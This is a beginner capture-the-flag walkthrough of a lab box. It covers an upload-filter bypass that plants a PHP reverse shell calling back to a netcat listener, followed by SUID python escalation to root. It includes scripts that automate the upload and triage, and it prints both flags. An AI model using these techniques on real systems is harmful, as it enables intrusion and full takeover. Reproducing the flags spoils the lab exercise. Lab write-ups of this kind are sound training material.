A CTF for beginners: can you root me?
Scan the ports with nmap:
nmap -A -T4 10.10.124.205
We find two open ports: 22 (SSH) and 80 (HTTP).
Go to the web page and view the source: nothing of interest there.
We use gobuster to enumerate directories on the web server:
gobuster dir -u http://10.10.124.205/ -w /usr/share/wordlists/dirb/common.txt -t 30
We can see a hidden directory called /panel/.
Opening /panel/ shows a file upload form like this.
This step requires us to upload a web shell; Kali ships one at /usr/share/webshells/php/php-reverse-shell.php.
cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
vi reverse.php
At lines 49 and 50, set $ip to your machine's address and $port to 4444 (any port you will listen on works).
Let's upload it to the panel.
The upload is rejected, so let's search for a PHP file upload bypass.
The filter blocks the .php extension only, so we can rename the file to another extension the server still executes as PHP: .phtml, .php3, .php4, .php5 or .inc.
mv reverse.php reverse.php5
The trick worked and the upload is accepted.
Now set up netcat on our machine to listen for the reverse shell:
nc -lnvp 4444
Back in the gobuster output there was an /uploads/ directory. Browse to it, open reverse.php5, and go back to netcat, which now has the shell.
The first flag is found with:
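The two manual steps above (edit lines 49 and 50 of the web shell, then rename it past the extension filter) can be scripted so every candidate extension is prepared in one go. This is an added example and not part of the original writeup: it assumes the template carries the `$ip = '127.0.0.1';  // CHANGE THIS` and `$port = 1234;       // CHANGE THIS` lines of the Kali copy, that the panel's form field is named `file` (not stated in the writeup, an assumption), and that /uploads/ serves a directory listing as it did here.

```shell
#!/bin/sh
# Added example, not from the original writeup. Patches the callback address
# and port in php-reverse-shell.php with sed and writes one copy per candidate
# extension, so each variant can be tried against the upload filter.

# Extensions to try when only ".php" is rejected (the writeup's list minus .php).
# Whether the server really executes them depends on its PHP handler config.
ALT_EXTS="phtml php3 php4 php5 inc"

# Constructed stand-in for the two relevant template lines (lines 49-50 of the
# Kali copy), so the example runs offline without the real file.
make_template() {
    printf '%s\n' '<?php' \
        "\$ip = '127.0.0.1';  // CHANGE THIS" \
        "\$port = 1234;       // CHANGE THIS" \
        '// ... rest of the pentestmonkey shell ...' > "$1"
}

# prepare_shell TEMPLATE LHOST LPORT OUTDIR
# Writes OUTDIR/reverse.<ext> for each extension in ALT_EXTS with the callback
# patched in, and prints each path written.
prepare_shell() {
    template=$1 lhost=$2 lport=$3 outdir=$4
    # Refuse to proceed if the template is not what we expect: uploading a
    # shell that still calls back to 127.0.0.1 wastes the attempt.
    grep -q "^[\$]ip = '" "$template" || { echo "no \$ip line in $template" >&2; return 1; }
    grep -q "^[\$]port = [0-9]" "$template" || { echo "no \$port line in $template" >&2; return 1; }
    mkdir -p "$outdir"
    for ext in $ALT_EXTS; do
        out="$outdir/reverse.$ext"
        sed -e "s/^[\$]ip = '[^']*';/\$ip = '$lhost';/" \
            -e "s/^[\$]port = [0-9]*;/\$port = $lport;/" "$template" > "$out"
        echo "$out"
    done
}

# try_uploads PANEL_URL UPLOADS_URL FILE...
# Posts each file to the panel (form field name "file" is an assumption) and
# checks the /uploads/ listing for it. It deliberately does not request the
# uploaded file: doing so triggers the reverse shell, which you want to do by
# hand once the netcat listener is up.
try_uploads() {
    panel=$1 uploads=$2; shift 2
    for f in "$@"; do
        name=$(basename "$f")
        curl -s -o /dev/null -F "file=@$f" "$panel"
        if curl -s "$uploads/" | grep -q "$name"; then
            echo "accepted: $uploads/$name (request it to fire the callback)"
        else
            echo "rejected: $name"
        fi
    done
}

# Offline demo on the constructed template: show the patched lines.
work=$(mktemp -d)
make_template "$work/tpl.php"
prepare_shell "$work/tpl.php" 10.10.14.5 4444 "$work/out" > /dev/null
grep -e '^[$]ip' -e '^[$]port' "$work/out/reverse.php5"
rm -rf "$work"
# Live use, after "nc -lnvp 4444" is running:
#   prepare_shell /usr/share/webshells/php/php-reverse-shell.php <LHOST> 4444 out
#   try_uploads http://10.10.124.205/panel/ http://10.10.124.205/uploads out/reverse.*
```

The pre-flight `grep` checks matter more than they look: a copy of the shell with the wrong `$ip` line format would silently keep the 127.0.0.1 default and the listener would never see a connection.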
find / -name user.txt 2>/dev/null
| Flag | user.txt |
|---|---|
| Answer | THM{y0u_g0t_a_sh3ll} |
The first step is to search for files with the SUID bit set:
find / -user root -perm /4000 2>/dev/null
We find a lot of SUID files. Among them is /usr/bin/python: because it is SUID root, any process it starts runs with root's effective UID, so we can use it to spawn a root shell.
GTFOBins (python, SUID section) gives the command; the -p flag stops sh from dropping the elevated effective UID:
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
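Reading a long SUID listing by eye is how candidates get missed. The following is an added example, not part of the original writeup: it filters `find` output down to binaries that appear in a small constructed list of names GTFOBins documents under SUID (the real site is the reference; the list here is an assumption and deliberately short).

```shell
#!/bin/sh
# Added example, not from the original writeup: triage SUID binaries against
# a constructed subset of the names GTFOBins lists under "SUID".
GTFO_SUID="python python2 python3 bash env find vim nmap perl php"

# find_suid: the writeup's search, restricted to regular files.
find_suid() {
    find / -user root -perm -4000 -type f 2>/dev/null
}

# suid_candidates: read absolute paths on stdin and print those whose basename
# is in GTFO_SUID. A trailing version suffix is stripped before matching so
# that /usr/bin/python2.7 or php7.4 still match "python" and "php".
suid_candidates() {
    while IFS= read -r path; do
        base=$(basename "$path")
        stem=$(printf '%s' "$base" | sed 's/[0-9.]*$//')
        for name in $GTFO_SUID; do
            if [ "$base" = "$name" ] || [ "$stem" = "$name" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Constructed sample of find output, standing in for a real listing.
SAMPLE="/usr/bin/passwd
/usr/bin/python
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/python2.7
/bin/mount"

printf '%s\n' "$SAMPLE" | suid_candidates
# Live use: find_suid | suid_candidates
# Once a hit is confirmed, the GTFOBins one-liner for it spawns the shell;
# "sh -p" is what keeps euid=0, without it the shell resets euid to the real
# UID. Verify with "id": it should show euid=0(root).
```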
| Flag | root.txt |
|---|---|
| Answer | THM{pr1v1l3g3_3sc4l4t10n} |